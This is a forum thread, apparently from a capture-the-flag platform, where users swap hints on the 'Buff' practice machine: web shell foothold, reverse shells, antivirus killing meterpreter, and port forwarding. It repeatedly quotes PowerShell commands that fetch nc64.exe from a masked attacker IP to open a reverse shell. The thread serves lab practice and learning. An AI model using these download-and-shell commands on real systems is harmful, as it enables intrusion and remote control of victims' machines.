Official Buff Discussion

Compared to other ‘Easy’ machines this was quite different! I think this box would be easy for those who are familiar with certain tools and quite challenging for the who are not, which was my case. Thanks to @MariaB for their help.

A lot of the comments already on the forum will help you. I want to reiterate the tips for foothold, don’t dismiss what is in front of you, enumerate everything but don’t be drawn into a rabbit hole.

For root, I could not find anything on the box to help me move forward but once you understand what to do there are tools out there that an help.

Finally!
whoami
buff\administrator

I enjoyed this machine quite a bit. Searching for exploit was PITA because everything tells you “it is one time job”. Apparently it is not.
I also struggled a bit with ssh. I forgot than in Parrot ssh service is disabled by default. I was banging my head against the wall why my p****.*** was not connecting…
Thanks @egotisticalSW for nice machine and @TazWake for your invaluable support and thorough comments.

Got the initial web shell but not able to upgrade it. Tried downloading nc.exe for reverse shell but did not work… can anyone nudge me in the right direction…

@sparrow1 said:

I enjoyed this machine quite a bit. Searching for exploit was PITA because everything tells you “it is one time job”. Apparently it is not.
I also struggled a bit with ssh. I forgot than in Parrot ssh service is disabled by default. I was banging my head against the wall why my p****.*** was not connecting…

Yeah, I think this has tripped up a few people. I was fortunate in that a few retired boxes have needed port forwarding like this, so I remembered to turn it on :smile:

Thanks @egotisticalSW for nice machine and @TazWake for your invaluable support and thorough comments.

Glad you got it.

Type your comment> @meb22f102 said:

Got the initial web shell but not able to upgrade it. Tried downloading nc.exe for reverse shell but did not work… can anyone nudge me in the right direction…

Did you try a different port?

Can anybody help with AV. I get root shell with meterpreter but it dies immidiatly

reverse nc connection not dropping in any one fancying giving a helping hand please

Type your comment> @Equity said:

reverse nc connection not dropping in any one fancying giving a helping hand please

nevermind

Type your comment> @VoltK said:

Can anybody help with AV. I get root shell with meterpreter but it dies immidiatly

I had the same problem and switched to the non-staged shell_ variant.

What is a surefire way to get a file onto the remote machine via a webshell? If I don’t run with powershell.exe before the command it says the command is not recognized so is the webshell not actually talking to powershell? If I run it with the powershell.exe I get an error saying the machine cant connect to my remote server which I’m hosting with python. I can ping my attack machine so I know the IP is correct and the interface is working but still unsure what is happening.

I have tried the following:

IEX (New-Object System.Net.WebClient).DownloadFile(‘http://10.10.xx.xx/nc64.exe’, ‘nc64.exe’)

Invoke-WebRequest -Uri 'http://10.10.xx.xx/nc64.exe’-OutFile ‘nc64.exe’

powershell.exe wget http://10.10.xx.xx/nc64.exe

Invoke-WebRequest should work. Try a full path in the -outfile

Type your comment> @lovesay said:

What is a surefire way to get a file onto the remote machine via a webshell? If I don’t run with powershell.exe before the command it says the command is not recognized so is the webshell not actually talking to powershell? If I run it with the powershell.exe I get an error saying the machine cant connect to my remote server which I’m hosting with python. I can ping my attack machine so I know the IP is correct and the interface is working but still unsure what is happening.

I have tried the following:

IEX (New-Object System.Net.WebClient).DownloadFile(‘http://10.10.xx.xx/nc64.exe’, ‘nc64.exe’)

Invoke-WebRequest -Uri 'http://10.10.xx.xx/nc64.exe’-OutFile ‘nc64.exe’

powershell.exe wget http://10.10.xx.xx/nc64.exe

What command do you use to copy stuff on your own terminal?

Type your comment> @Phrenesis2k said:

Invoke-WebRequest should work. Try a full path in the -outfile

That was it so it seems. Thank you so much. The issue now is some kind of lag that causes the file not to be downloaded. It shows the file in the remote machines directory but with size 0. I assume this is a network issue.

Update: Running a personal VPN on top of OpenVPN seems to cause some issues.

Type your comment> @KobashigawaBR said:

Type your comment> @lovesay said:

What is a surefire way to get a file onto the remote machine via a webshell? If I don’t run with powershell.exe before the command it says the command is not recognized so is the webshell not actually talking to powershell? If I run it with the powershell.exe I get an error saying the machine cant connect to my remote server which I’m hosting with python. I can ping my attack machine so I know the IP is correct and the interface is working but still unsure what is happening.

I have tried the following:

IEX (New-Object System.Net.WebClient).DownloadFile(‘http://10.10.xx.xx/nc64.exe’, ‘nc64.exe’)

Invoke-WebRequest -Uri 'http://10.10.xx.xx/nc64.exe’-OutFile ‘nc64.exe’

powershell.exe wget http://10.10.xx.xx/nc64.exe

What command do you use to copy stuff on your own terminal?

wget typically.

@lovesay said:

What is a surefire way to get a file onto the remote machine via a webshell? If I don’t run with powershell.exe before the command it says the command is not recognized so is the webshell not actually talking to powershell? If I run it with the powershell.exe I get an error saying the machine cant connect to my remote server which I’m hosting with python. I can ping my attack machine so I know the IP is correct and the interface is working but still unsure what is happening.

Depending on the exploit you used, you can use commands in the browser to download files to the machine in the directory where your shell landed. You can also use this to execute them. There are cross-platform tools designed for manipulating servers.

Type your comment> @lovesay said:

What is a surefire way to get a file onto the remote machine via a webshell? If I don’t run with powershell.exe before the command it says the command is not recognized so is the webshell not actually talking to powershell? If I run it with the powershell.exe I get an error saying the machine cant connect to my remote server which I’m hosting with python. I can ping my attack machine so I know the IP is correct and the interface is working but still unsure what is happening.

I have tried the following:

IEX (New-Object System.Net.WebClient).DownloadFile(‘http://10.10.xx.xx/nc64.exe’, ‘nc64.exe’)

Invoke-WebRequest -Uri 'http://10.10.xx.xx/nc64.exe’-OutFile ‘nc64.exe’

powershell.exe wget http://10.10.xx.xx/nc64.exe

And the curl command?.. Directly from the directory where your shell landed.

Smbserver also a great way to move files to the target

Can someone give me a nudge please? I believe I am stuck on root with the /a***n page. I have not gotten user yet.

@orc said:

Can someone give me a nudge please? I believe I am stuck on root with the /a***n page. I have not gotten user yet.

Look at a different page. Gather information and see what you can do with it.

Type your comment> @choupit0 said:

Type your comment> @lovesay said:

What is a surefire way to get a file onto the remote machine via a webshell? If I don’t run with powershell.exe before the command it says the command is not recognized so is the webshell not actually talking to powershell? If I run it with the powershell.exe I get an error saying the machine cant connect to my remote server which I’m hosting with python. I can ping my attack machine so I know the IP is correct and the interface is working but still unsure what is happening.

I have tried the following:

IEX (New-Object System.Net.WebClient).DownloadFile(‘http://10.10.xx.xx/nc64.exe’, ‘nc64.exe’)

Invoke-WebRequest -Uri 'http://10.10.xx.xx/nc64.exe’-OutFile ‘nc64.exe’

powershell.exe wget http://10.10.xx.xx/nc64.exe

And the curl command?.. Directly from the directory where your shell landed.

Yeah that works too. Thanks for the insight. I’m just glad I was able to confirm that these commands should work when input correctly rather than thinking it was something else.